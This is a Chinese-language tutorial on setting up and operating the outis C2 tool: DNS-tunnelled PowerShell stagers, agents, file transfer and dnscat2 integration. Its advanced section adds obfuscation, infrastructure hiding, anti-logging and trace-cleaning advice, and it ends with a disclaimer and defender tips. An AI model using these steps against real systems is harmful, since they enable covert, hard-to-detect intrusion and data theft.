1. 项目概述:一个专注于隐蔽通信的远程管理工具
在安全研究或特定授权的系统管理场景中,我们常常需要一个能与目标系统建立稳定、隐蔽通信通道的工具。这类工具通常被称为RAT(远程访问木马)或C2(命令与控制)框架,比如大家熟知的Meterpreter或Empire。今天要深入探讨的,是一个名为outis的自定义工具。它的核心定位非常清晰:专注于实现服务器与目标系统之间的通信、文件传输、端口转发和Shell交互,而非漏洞利用或持久化控制。你可以把它理解为一个“通信引擎”,它的价值在于其灵活多样的传输方式和平台适配能力,尤其是在那些传统TCP连接可能受限或容易被检测的网络环境中。
outis这个名字本身就充满了极客的幽默感,它源自荷马史诗《奥德赛》中英雄奥德修斯(Odysseus)的诡计。当独眼巨人波吕斐摩斯(Polyphemus)问其姓名时,奥德修斯谎称自己叫“Outis”,意为“无人”。因此,当波吕斐摩斯后来高喊“无人要杀我”时,自然无人前来救援。这个名字巧妙地隐喻了工具的设计目标:在目标系统中,其通信行为尽可能地像“无人”操作一样隐蔽、不引人注目。
对于安全研究人员、红队成员或需要进行深度系统管理的运维人员来说,理解并掌握这样一款工具的工作原理和实战用法,意味着多了一种在复杂网络环境下建立控制通道的思路。它尤其适合用于模拟攻击、测试网络防御策略中的检测盲点,或在受限环境中进行合法的远程管理。接下来,我将从设计思路、核心模块、实战配置到排错技巧,为你完整拆解outis。
2. 核心设计思路与架构解析
2.1 核心组件与工作流程
outis的设计遵循了典型的C2架构分层思想,但做了显著的简化,将重心完全放在了“通信”本身。理解其组件是掌握它的第一步:
处理器(Handler):这是攻击者或管理员控制端运行的核心服务。它负责监听来自代理的连接,解析并执行操作者输入的命令,管理会话状态,并生成所需的载荷(Stager)。它通常运行在攻击者控制的服务器上,是整个控制链的大脑。
代理(Agent):这是在目标系统(受害者)上执行的最终载荷。它负责接收来自处理器的指令,在本地执行相应的操作(如执行命令、上传下载文件),并将结果通过指定的传输通道回传给处理器。
outis的Agent设计力求精简,专注于核心功能。分阶段器(Stager):这是一个轻量级的初始代码片段。它的唯一使命是:想方设法将完整的Agent载荷拉取到目标系统并执行。为什么需要分阶段?主要是为了规避检测和绕过大小限制。一个功能完整的Agent可能体积较大,直接投递容易被静态分析发现。而一个微小的Stager则隐蔽得多,它可以通过DNS查询、HTTP请求等方式,分片或隐蔽地下载完整的Agent代码。
传输模块(Transport):这是
outis最具特色的部分,定义了Agent/Stager与Handler之间的通信信道。它抽象了通信协议,使得核心逻辑与底层网络协议解耦。目前主要支持:- Reverse TCP:最经典的反向TCP连接,代理主动连接处理器的监听端口。
- DNS:利用DNS协议进行通信。这是
outis的亮点,它可以将命令、数据编码到DNS查询(如TXT、A、AAAA、MX记录)和响应中,从而穿透仅允许DNS出站的严格网络策略。
平台模块(Platform):定义了Agent和Stager代码所针对的目标系统环境。目前主要支持PowerShell,这意味着生成的载荷是PowerShell脚本,可以在Windows系统上直接运行,无需额外编译或依赖。
整个工作流程可以概括为:处理器生成特定平台和传输的Stager -> Stager在目标系统执行,通过指定传输连接处理器并下载Agent -> Agent在内存中加载,与处理器建立加密控制通道 -> 操作者通过处理器会话对Agent下发指令。
2.2 为什么选择这样的设计?
这种设计的优势在于其模块化和专注性。
- 模块化带来灵活性:传输(Transport)和平台(Platform)作为可插拔的模块,意味着未来可以相对容易地扩展新的协议(如ICMP、HTTP/HTTPS over Proxy)或支持新的平台(如Python、.NET Assembly)。在实战中,你可以根据目标环境快速切换。例如,在内网横向移动时,如果发现目标服务器只允许DNS流量外联,那么DNS传输模块就成了唯一可行的选择。
- 专注性提升隐蔽性:
outis明确声明不包含漏洞利用功能。这反而使其成为一个更纯粹的“后期工具”。在已经通过其他方式获得初始立足点(例如通过钓鱼获取了Shell)后,使用outis建立更稳定、功能更全的管理通道,可以避免引入不必要的攻击特征,降低被入侵检测系统(IDS)基于漏洞利用模式告警的风险。 - 加密与认证保障安全:工具支持TLS加密传输和RSA签名认证。这确保了控制流量即使被截获也难以解密,同时防止了中间人攻击或受害者执行被篡改的恶意Agent代码。在红队对抗中,保护自己的C2通信不被蓝队解密和分析至关重要。
注意:
outis的DNS传输实现,其灵感部分来源于dnscat2等项目。它将数据分割、编码到DNS协议的各字段中,利用DNS查询的普遍性和高容忍度来传输数据。这种方式的缺点是带宽极低且延迟高,不适合传输大文件,但作为命令通道和下载小型工具,它往往能出其不意。
3. 环境搭建与依赖处理实战
3.1 处理器(Handler)环境准备
outis的处理器是用Python 3编写的,因此第一步是准备好Python环境。官方推荐在Linux环境下运行处理器(如Kali, Arch, Ubuntu等)。为了避免污染系统Python环境,强烈建议使用Python虚拟环境。
以下是在Debian/Ubuntu系统上的标准搭建流程:
# 1. 更新系统并安装基础编译工具和Python3 sudo apt update && sudo apt install -y git python3 python3-pip python3-venv build-essential libssl-dev # 2. 克隆outis仓库(包含必要的子模块) git clone --recursive https://github.com/SySS-Research/outis.git cd outis # 3. 创建并激活虚拟环境 python3 -m venv outis-venv source outis-venv/bin/activate # 激活后,命令行提示符前会出现 (outis-venv) # 4. 安装Python依赖 # 注意:pycrypto库可能需要系统级的加密开发库 pip install progressbar2 dnspython pycrypto pyopenssl关键依赖解析与避坑指南:
- pycrypto vs cryptography:项目明确需要
pycrypto(一个较老的库),而不是更新的cryptography。在某些系统上直接pip install pycrypto可能会因为缺少python-dev头文件或gcc而编译失败。确保已安装build-essential和python3-dev(或python-dev)包。 - pyOpenSSL版本:需要16.1.0或更高版本。安装后可以用
python3 -c 'import OpenSSL; print(OpenSSL.version.__version__)'验证。高版本通常兼容,但若遇到TLS握手问题,可尝试指定版本安装:pip install pyOpenSSL==16.2.0。 - 虚拟环境的必要性:不同安全工具可能依赖冲突的Python库版本。使用虚拟环境能将
outis的依赖完全隔离。每次使用前,只需进入outis目录并执行source outis-venv/bin/activate即可。
3.2 生成自签名证书
为了使用TLS加密和代码签名认证,outis需要一个PEM格式的证书文件(包含私钥和证书)。项目提供了一个方便的脚本:
# 在outis项目根目录下执行 ./data/gencert.sh这个脚本会调用OpenSSL生成一个自签名的RSA证书对,并保存为data/outis.pem。在后续配置中,我们会用到这个文件来签名Agent代码,并在TLS通信中使用。
实操心得:在实际红队活动中,使用自签名证书容易被流量检测设备识别。在高度对抗的环境下,可以考虑使用与目标环境可信的域名相匹配的、由公共或内部CA签发的“合法”证书,这需要更复杂的准备工作,但隐蔽性会大大增强。
3.3 低端口监听权限问题
处理器在监听DNS(53端口)或HTTPS(443端口)等低端口时,需要root权限。有几种处理方式:
- 直接使用sudo运行:最简单,但让整个Python进程拥有高权限存在安全风险。
- 使用setcap赋予能力:更安全的方式是赋予Python解释器特定的网络能力。
执行后,该Python解释器启动的进程就能绑定低端口了。注意:这仅对指定的二进制文件生效,且虚拟环境内的Python是软链接,可能需要对原解释器设置。sudo setcap 'cap_net_bind_service=+ep' /usr/bin/python3.9 # 请替换为你的实际python路径 - 端口转发:在非特权端口(如5353)运行处理器,然后使用iptables或firewalld将53端口的流量转发过去。
sudo iptables -t nat -A PREROUTING -p udp --dport 53 -j REDIRECT --to-port 5353
我个人倾向于第二种setcap方式,它平衡了安全性和便利性。
4. 核心模块配置与使用详解
4.1 启动与基础配置
进入虚拟环境并启动outis交互式控制台:
cd outis source outis-venv/bin/activate python3 outis.py你会看到outis>提示符。首先,我们需要设置几个核心选项。
outis> set TRANSPORT DNS outis> set PLATFORM POWERSHELL outis> set ZONE yourdomain.com # 这是关键!需要你拥有或可控的域名TRANSPORT DNS:选择DNS作为传输协议。这是outis的特色功能。PLATFORM POWERSHELL:生成针对Windows PowerShell的载荷。ZONE:这是DNS传输的核心。处理器会监听对这个域名的子域查询。例如,设置为c2.mydomain.com,那么Stager就会去查询类似abc123.c2.mydomain.com这样的地址。你必须能够配置该域名的NS记录,将其指向运行处理器的服务器IP。
4.2 传输模块:DNS的深度配置
使用set命令可以配置特定模块的选项。查看DNS模块的所有选项:
outis> set TRANSPORT DNS outis> show options关键配置解析:
| 选项名 | 默认值 | 说明 |
|---|---|---|
ZONE | (无) | 必须设置。你的攻击域名。 |
LHOST | 0.0.0.0 | 处理器监听的本地IP。如果服务器有多个IP,建议指定公网IP或0.0.0.0。 |
LPORT | 53 | 监听端口。需要root权限或setcap。 |
DNSTYPE | TXT | Stager阶段使用的DNS记录类型。TXT记录可以携带较多数据,A记录更普遍但数据量小。 |
DNSSERVER | (空) | 如果处理器本身不是权威DNS服务器,可以指定一个上游DNS服务器IP。通常留空,让处理器直接响应。 |
DNS配置实战要点:
- 域名设置:假设你的域名是
example.com,你希望用c2.example.com作为C2服务器。你需要:- 在域名注册商处,为
c2.example.com添加一条A记录,指向你的处理器服务器的公网IP。 - 为
c2.example.com添加一条NS记录,指向自身(即c2.example.com)。这表示c2.example.com是一个独立的子域,并由其A记录指向的服务器负责解析。有些注册商界面可能需要你添加“子域名”或“主机记录”为c2,类型NS,值为c2.example.com.(注意末尾点)。
- 在域名注册商处,为
- 处理器作为DNS服务器:
outis的处理器内置了一个简易的、只处理特定查询的DNS服务器。它只响应与ZONE相关的查询,对于其他查询会返回错误或不予理会。因此,你的服务器不需要运行BIND或dnsmasq等全功能DNS服务。
4.3 平台模块:PowerShell载荷定制
查看PowerShell平台选项:
outis> set PLATFORM POWERSHELL outis> show options| 选项名 | 默认值 | 说明 |
|---|---|---|
STAGED | TRUE | 是否使用分阶段模式。TRUE会生成一个小的Stager,再由Stager下载Agent。FALSE会生成一个包含完整Agent的单体载荷,体积巨大,不推荐。 |
STAGEENCODING | TRUE | 是否对传输的Agent代码进行编码(简单的循环XOR)。这是为了规避基础的字符串检测,不是强加密。 |
STAGEAUTHENTICATION | TRUE | 强烈建议保持TRUE。Stager会使用RSA证书验证下载的Agent代码签名,防止代码在传输中被篡改。 |
STAGECERTIFICATEFILE | $TOOLPATH/data/outis.pem | 用于签名和验证的PEM证书文件路径。默认使用自生成的。 |
AGENTTYPE | DEFAULT | 选择要部署的Agent类型。DEFAULT是outis自己的Agent。DNSCAT2或DNSCAT2DOWNLOADER用于部署第三方dnscat2的PowerShell客户端。 |
AGENTDEBUG | FALSE | 设为TRUE时,Agent会在目标系统上输出调试信息到控制台,极不隐蔽,仅用于测试。 |
重要安全提示:
STAGEAUTHENTICATION和CHANNELENCRYPTION(在Handler全局设置中,默认为TLS)是保护你控制链不被他人劫持的关键。在真实环境中务必启用。自签名证书会带来TLS指纹特征,但在启用认证的情况下,这比明文通信要安全得多。
4.4 生成与使用Stager
配置完成后,就可以生成Stager了。
outis> generatestager命令会输出一大段Base64编码的PowerShell命令。这段命令就是Stager。它的作用非常单一:通过DNS查询,从你的处理器下载、验证并执行真正的Agent。
如何使用这个Stager?
- 目标系统执行:你需要想办法让这段PowerShell命令在目标Windows系统上执行。方法有很多,例如:
- 通过已有的一个低权限Shell(如WebShell)粘贴执行。
- 将其写入一个
.ps1脚本文件,然后通过其他方式(如PsExec、WMI、计划任务)触发执行。 - 将其转换为一行命令,通过
powershell -Enc <Base64>直接运行(这正是generatestager输出的格式)。
- 命令解读:输出的命令类似
powershell.exe -Enc JAByAD0AR...。-Enc参数告诉PowerShell执行后面跟随的Base64编码的字符串。这是一种常见的绕过基础命令过滤的方法。
生成Stager后的操作:
outis> run执行run命令,处理器就会开始监听指定的端口(如DNS的53端口),并等待Stager的连接。一旦Stager在目标上执行,它会发起DNS查询,处理器收到后会将签名的Agent代码分片通过DNS响应传回。你会在处理器控制台看到类似[+] Sending staged agent...和进度条。传输完成后,Agent在目标内存中加载,并与处理器建立TLS加密连接,此时你会进入一个新的outis session>提示符,表示控制通道已建立。
5. 实战操作:建立会话与常用命令
成功建立会话后,你就拥有了一个在目标系统上的交互式控制台。以下是一些核心操作命令。
5.1 基础会话管理
- 查看会话信息:在
outis session>提示符下,可以执行一些命令。输入help可以查看当前可用的命令列表。 - 后台与会话切换:
outis本身支持多会话(如果多个Agent上线)。在outis>主提示符下,使用sessions列出所有活跃会话,使用session -i <ID>切换到指定会话。 - 退出与关闭:
- 在
outis session>下输入exit,会询问是否断开与该Agent的连接。 - 在
outis>主提示符下输入exit,会退出整个outis程序。
- 在
5.2 文件传输操作
文件传输是RAT的核心功能之一。outis的传输受限于DNS的带宽,但对于小文件或文本文件是可行的。
上传文件到目标:
outis session> upload /local/path/to/file.txt C:\Users\Public\file.txt处理器会将本地文件
file.txt分块编码到DNS查询中,发送给Agent,Agent在目标位置重组文件。你会看到上传进度条。从目标下载文件:
outis session> download C:\Windows\System32\drivers\etc\hosts /tmp/target_hostsAgent读取目标文件,将数据分块传回处理器,处理器保存到本地路径。同样会有进度显示。
注意事项:DNS传输速度慢,延迟高。传输大文件(如超过1MB)会非常耗时且不稳定,可能触发超时。它更适合传输工具脚本(如
mimikatz.exe)、配置文件或窃取到的密钥文件等小体积数据。
5.3 执行命令与交互式Shell
根据outis项目描述,当前版本可能主要支持文件传输和基础通信测试(ping)。一个功能完整的RAT通常会有shell或execute命令来执行系统命令。如果outis的Agent实现了此功能,其用法可能类似:
outis session> execute whoami [+] Command executed: whoami [+] Output: nt authority\system outis session> shell [+] Spawning interactive shell. Use 'exit' to return. C:\Windows\system32>ipconfig C:\Windows\system32>...如果内置命令不支持,一种常见的变通方法是:先上传一个轻量级命令行工具(如netcat的Windows版),然后通过execute命令调用它,反向连接回你的另一个监听端口,从而获得一个标准的远程Shell。
5.4 使用第三方Agent:集成DNSCAT2
outis的一个有趣特性是它可以充当dnscat2的“搬运工”。dnscat2是另一个非常强大的DNS隧道工具,功能更丰富。
outis> set TRANSPORT DNS outis> set PLATFORM POWERSHELL outis> set AGENTTYPE DNSCAT2 # 或 DNSCAT2DOWNLOADER outis> set ZONE yourdomain.com outis> run当设置为DNSCAT2时,outis生成的Stager会下载并执行内嵌的dnscat2PowerShell客户端代码。在Staging完成后,处理器会自动启动一个dnscat2服务器进程来接管后续的通信。此时,你的控制台会切换到dnscat2的界面。
两者的区别:
DNSCAT2:将完整的dnscat2 PowerShell客户端代码通过DNS分片传输。速度慢,但纯DNS。DNSCAT2DOWNLOADER:Stager会尝试通过HTTPS(如果出站规则允许)从指定URL下载dnscat2客户端,失败则回退到DNS。速度可能更快,但触发了HTTP(S)流量。
这种方式结合了outis在Staging阶段的灵活性和dnscat2在隧道功能上的强大(如端口转发、多会话管理),是实战中一个很好的组合策略。
6. 高级技巧与隐蔽性增强
6.1 载荷混淆与免杀
默认生成的PowerShell Stager是Base64编码的,但模式固定,容易被静态检测。你可以进一步混淆:
- 字符串拆分与拼接:将长的Base64字符串拆分成多个变量,再在运行时拼接。
- 添加垃圾代码:在Stager脚本中插入大量无实际功能的代码,干扰分析。
- 使用Invoke-Obfuscation等工具:有专门针对PowerShell的混淆框架,可以大幅改变代码特征。
- 自定义编码:修改
outis源码中STAGEENCODING使用的XOR密钥和算法,使用更复杂的编码方式。
重要提醒:混淆只能增加分析难度,不能从根本上免杀。现代终端防护(EDR)更多依赖行为检测。因此,保持低权限、慢速、合法的操作模式比载荷混淆更重要。
6.2 基础设施配置
- 域名与CDN:不要直接使用你的真实服务器IP作为A记录。可以使用CDN(如Cloudflare)来代理DNS查询。将域名的NS记录指向CDN,CDN再回源到你的真实服务器IP。这可以隐藏服务器IP,并在遭受攻击时快速切换。
- 多级C2(重定向器):设置一个前端服务器(重定向器)接收所有DNS查询,它只做简单的转发,将属于你C2域名的查询转发给后端的真实处理器。重定向器可以部署在多处,即使一个被阻断,可以快速切换域名指向另一个。
- 流量模仿:
outis的DNS查询模式有其特征。可以研究目标环境内合法的DNS流量模式(查询间隔、子域名命名规律、记录类型混合使用等),并尝试修改outis的传输模块,使其流量更像正常的业务查询。
6.3 操作安全(OpSec)
- 避免在Agent上执行高危命令:如
whoami /groups、net group “domain admins”等命令会触发大量日志。尽量先通过upload上传一个信息收集脚本,让脚本在本地运行并输出到文件,再download回来。 - 清理痕迹:
outis的Agent是运行在内存中的,但通过它上传的工具或下载的文件会落地。制定好清理计划,使用完毕后删除临时文件。 - 控制节奏:避免在目标系统上连续发起高频的DNS查询,这容易被流量异常检测系统发现。在命令之间加入随机延迟。
- 使用合法的证书:如前所述,考虑为你的C2域名申请一个便宜的DV SSL证书,替换掉自签名的
outis.pem。这能使TLS握手流量看起来更正常。
7. 常见问题排查与调试记录
在实际使用中,你肯定会遇到各种问题。以下是一些典型场景和排查思路。
7.1 Stager执行后无反应
- 症状:在目标机器执行了Stager命令,但处理器控制台没有收到连接,Stager命令执行后迅速退出。
- 排查步骤:
- 检查处理器监听:在服务器上运行
sudo netstat -tulnp | grep :53,确认outis进程是否在53端口监听UDP。 - 检查域名解析:从一台外部机器(如你的笔记本)执行
nslookup -type=txt randomstring.yourzone.com。观察请求是否能到达你的服务器,以及outis处理器是否收到了查询(查看处理器日志)。如果nslookup超时,说明域名NS记录或网络路由有问题。 - 检查防火墙:确保服务器防火墙(如
ufw,firewalld, iptables)允许UDP 53端口入站。 - 启用调试:在生成Stager前,设置
set AGENTDEBUG TRUE。这样Agent会在目标系统控制台输出信息(非常暴露,仅用于测试)。观察是否有错误信息,例如DNS解析失败、证书验证失败等。 - 分析Stager代码:将Base64编码的Stager解码,查看其逻辑。它可能因为目标系统的PowerShell执行策略(Restricted)而无法运行。可以尝试先执行
powershell -ExecutionPolicy Bypass -Enc ...。
- 检查处理器监听:在服务器上运行
7.2 文件传输中断或失败
- 症状:上传或下载文件时,进度条卡住,最后报超时错误。
- 原因与解决:
- DNS报文大小限制:UDP DNS报文通常限制在512字节(若支持EDNS0可更大)。
outis需要将文件分片到多个查询/响应中。网络延迟或丢包会导致个别分片丢失,从而整个传输失败。 - 增加重试和超时:可以尝试在平台设置中调整
TIMEOUT和RETRIES参数(如果暴露了这些选项),给每次DNS交互更多时间和重试机会。 - 传输小文件:这是DNS隧道的固有缺陷。对于必须传输的大文件,考虑先压缩,或通过其他已建立的通道(如已获得的Shell)使用
certutil、bitsadmin等系统工具进行下载。
- DNS报文大小限制:UDP DNS报文通常限制在512字节(若支持EDNS0可更大)。
7.3 证书验证错误
- 症状:Stager执行后,处理器显示开始发送Agent,但随后连接失败,目标端可能提示“ERROR2”(如果启用了
AGENTDEBUG)。 - 排查:这通常是证书不匹配导致的。确保处理器使用的
STAGECERTIFICATEFILE(默认data/outis.pem)就是最初用gencert.sh生成的那个文件,并且没有损坏。如果你更换了证书文件,之前生成的Stager将无法验证新证书签名的Agent。
7.4 与现有DNS服务冲突
- 症状:服务器上已经运行了BIND等DNS服务,占用了53端口。
- 解决:
- 停止现有DNS服务:
sudo systemctl stop named。 - 或者,让
outis监听其他端口(如5353),并使用iptables进行端口重定向(如前文所述)。 - 或者,配置现有DNS服务,将你的C2子域(如
c2.example.com)委派给outis进程。这需要更复杂的BIND视图或zone配置,不推荐新手操作。
- 停止现有DNS服务:
7.5 使用DNSCAT2后无法控制
- 症状:设置了
AGENTTYPE DNSCAT2,Staging成功后,outis启动了dnscat2,但不知道如何操作。 - 解决:你需要学习
dnscat2的基本命令。在dnscat2>提示符下:sessions:列出所有会话。session -i <id>:切换到指定会话。help:查看命令帮助。在会话内,你可以执行shell获得交互式Shell,download/upload传输文件等。outis在此只是起到了“搬运工”和“启动器”的作用,后续所有功能都由dnscat2提供。
8. 总结与个人体会
经过对outis从搭建到实战的完整剖析,我们可以看到它是一款设计思路清晰、特色鲜明的工具。它舍弃了漏洞利用、持久化等“大而全”的功能,专注于解决“如何在受限网络环境下建立可靠通信”这个核心问题。其模块化设计使得它在DNS隧道这个细分领域表现得相当灵活。
在实际使用中,我的体会是:DNS隧道是一把双刃剑。它的优势在于穿透能力强,在只允许DNS出站的环境中几乎是唯一选择,且流量容易与海量的正常DNS请求混淆。但劣势同样明显:速度慢、延迟高、可靠性对网络质量敏感,并且随着深度包检测(DPI)和DNS流量分析技术的普及,异常的DNS查询模式(长子域名、高频TXT查询等)越来越容易被识别。
因此,outis更适合作为备用通道或特定场景下的渗透测试工具。在红队行动中,我通常会先尝试建立更高效的HTTP(S)或反向TCP通道。只有在这些方式被阻断时,才会启用像outis这样的DNS隧道作为迂回手段。此外,将其与dnscat2结合使用,可以弥补outis自身在功能上的不足,形成一个功能更强的隐蔽通信组合。
最后必须再次强调,此类工具仅能在获得明确授权的安全评估、教学研究或对自有系统的管理中使用。未经授权使用是非法行为。理解它的原理,是为了更好地防御它。作为防御方,监控DNS流量中的异常模式(如超长子域名、对非标准域名的频繁TXT/AAAA查询、查询频率异常等),部署能够解密和检查DNS流量的安全设备,是应对此类隐蔽通道的关键。
